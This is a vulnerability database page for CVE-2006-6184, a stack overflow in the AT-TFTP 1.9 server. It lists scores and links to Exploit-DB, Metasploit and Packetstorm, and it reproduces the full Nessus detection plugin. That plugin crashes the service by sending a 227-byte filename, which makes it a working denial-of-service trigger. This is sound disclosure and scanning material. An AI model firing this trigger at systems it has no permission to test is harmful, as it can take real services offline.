Vulnerabilities > CVE-2006-6184 - Remote Buffer Overflow vulnerability in Alliedtelesyn At-Tftp 1.9

047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
alliedtelesyn
critical
nessus
exploit available
metasploit
NVD
Published: 2006-12-01
Updated: 2018-10-17

Summary

Multiple stack-based buffer overflows in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allow remote attackers to cause a denial of service (crash) or execute arbitrary code via a long filename in a (1) GET or (2) PUT command.

Vulnerable Configurations

Part Description Count
Application
Alliedtelesyn
2

Exploit-Db

  • descriptionTFTP Daemon v1.9 Denial of Service Exploit. CVE-2006-6184. Dos exploit for windows platform
    idEDB-ID:10603
    last seen2016-02-01
    modified2009-12-22
    published2009-12-22
    reporterSocket_0x03
    sourcehttps://www.exploit-db.com/download/10603/
    titleTFTP Daemon 1.9 - Denial of Service Exploit
  • descriptionAT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS. CVE-2006-6184. Dos exploit for windows platform
    fileexploits/windows/dos/24952.py
    idEDB-ID:24952
    last seen2016-02-03
    modified2013-04-12
    platformwindows
    port69
    published2013-04-12
    reporterxis_one
    sourcehttps://www.exploit-db.com/download/24952/
    titleAT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS
    typedos
  • descriptionAllied Telesyn TFTP Server 1.9 Long Filename Overflow. CVE-2006-6184. Remote exploit for windows platform
    fileexploits/windows/remote/16350.rb
    idEDB-ID:16350
    last seen2016-02-01
    modified2011-03-05
    platformwindows
    port
    published2011-03-05
    reportermetasploit
    sourcehttps://www.exploit-db.com/download/16350/
    titleAllied Telesyn TFTP Server 1.9 - Long Filename Overflow
    typeremote

Metasploit

descriptionThis module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a request (get/write) for an overly long file name.
idMSF:EXPLOIT/WINDOWS/TFTP/ATTFTP_LONG_FILENAME
last seen2020-04-11
modified2017-11-08
published2007-09-09
referenceshttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6184
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/tftp/attftp_long_filename.rb
titleAllied Telesyn TFTP Server 1.9 Long Filename Overflow

Nessus

NASL familyGain a shell remotely
NASL idAT_TFTPD_LONG_FILENAME_OVERFLOW.NASL
descriptionThe remote host appears to be running AT-TFTP Server, a tftpd server for Windows. The version of AT-TFTP Server installed on the remote host appears to be affected by a buffer overflow vulnerability involving a long filenames when getting or putting files. By leveraging this flaw, a remote attacker may be able to crash the remote service or to execute code on the affected host subject to the privileges under which the server operates.
last seen2020-06-01
modified2020-06-02
plugin id23736
published2006-11-28
reporterThis script is Copyright (C) 2006-2019 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/23736
titleAT-TFTP Server Filename Handling Remote Overflow
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if (description)
{
  script_id(23736);
  script_version("1.17");

  script_cve_id("CVE-2006-6184");
  script_bugtraq_id(21320);

  script_name(english:"AT-TFTP Server Filename Handling Remote Overflow");
  script_summary(english:"Checks for a buffer overflow vulnerability in AT-TFTP Server");

 script_set_attribute(attribute:"synopsis", value:
"The remote tftp server is affected by a buffer overflow vulnerability." );
 script_set_attribute(attribute:"description", value:
"The remote host appears to be running AT-TFTP Server, a tftpd server
for Windows. 

The version of AT-TFTP Server installed on the remote host appears to
be affected by a buffer overflow vulnerability involving a long
filenames when getting or putting files.  By leveraging this flaw, a
remote attacker may be able to crash the remote service or to execute
code on the affected host subject to the privileges under which the
server operates." );
 script_set_attribute(attribute:"see_also", value:"http://aluigi.altervista.org/adv/attftp-adv.txt" );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/452743/30/0/threaded" );
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"exploit_framework_core", value:"true");
 script_set_attribute(attribute:"metasploit_name", value:'Allied Telesyn TFTP Server 1.9 Long Filename Overflow');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/11/28");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/11/26");
 script_cvs_date("Date: 2019/03/06 18:38:55");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();


  script_category(ACT_DENIAL);
  script_family(english:"Gain a shell remotely");
  script_copyright(english:"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.");
  script_dependencies("tftpd_detect.nasl");
  script_require_keys("Services/udp/tftp", "Settings/ParanoidReport");
  exit(0);
}


include("misc_func.inc");
include("global_settings.inc");


if (report_paranoia < 2)
  exit(0, "This script only runs in 'paranoid' mode.");


port = get_kb_item("Services/udp/tftp");
if (!port) port = 69;


function tftp_get(port, file, mode) {
  local_var data, filter, i, ip, req, res, sport, udp;

  if (isnull(port)) port = 69;
  if (isnull(mode)) mode = "netascii";
  if (isnull(file)) return NULL;

  req = raw_string(
    0x00, 0x01,                        # Get
    file, 0x00,                        # file
    mode, 0x00                         # as per specified mode
  );

  ip = forge_ip_packet(
    ip_hl:5, 
    ip_v:4, 
    ip_tos:0, 
    ip_len:20, 
    ip_id:rand(), 
    ip_off:0, 
    ip_ttl:64, 
    ip_p:IPPROTO_UDP,
    ip_src:compat::this_host()
  );
  sport = rand() % 64512 + 1024;		     
  udp = forge_udp_packet(
    ip:ip, 
    uh_sport:sport, 
    uh_dport:port, 
    uh_ulen:8 + strlen(req), 
    data:req
  );

  filter = 'udp and dst port ' + sport + ' and src host ' + get_host_ip() + ' and udp[8:1]=0x00';
  res = send_packet(
    udp, 
    pcap_active:TRUE, 
    pcap_filter:filter, 
    pcap_timeout:1
  );

  # If there's a result, return the data.
  if (res) {
    return get_udp_element(udp:res, element:"data");
  }
}


# If the server is up...
file = string(SCRIPT_NAME, "-", unixtime());
res = tftp_get(port:port, file:file);
if (!isnull(res)) {
  # Send the exploit.
  res = tftp_get(port:port, file:crap(227));

  # Test the server again.
  res = tftp_get(port:port, file:file);

  # There's a problem if we didn't get anything back.
  if (isnull(res)) security_hole(port:port, protocol:"udp");
}

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/83147/attftp_long_filename.rb.txt
idPACKETSTORM:83147
last seen2016-12-05
published2009-11-26
reporterPatrick Webster
sourcehttps://packetstormsecurity.com/files/83147/Allied-Telesyn-TFTP-Server-1.9-Long-Filename-Overflow.html
titleAllied Telesyn TFTP Server 1.9 Long Filename Overflow

Statements

contributorSheldon Duthie
lastmodified2007-04-17
organizationAllied Telesyn
statementMore recent revision AT-TFTPD Server 2.0 does not suffer the listed vulnerability. Only the more recent revision AT-TFTPD Server 2.0 can be found for download from our website, currently via the following link: http://www.alliedtelesis.com/support/software/default.aspx?cid=1&amp;pid=182

References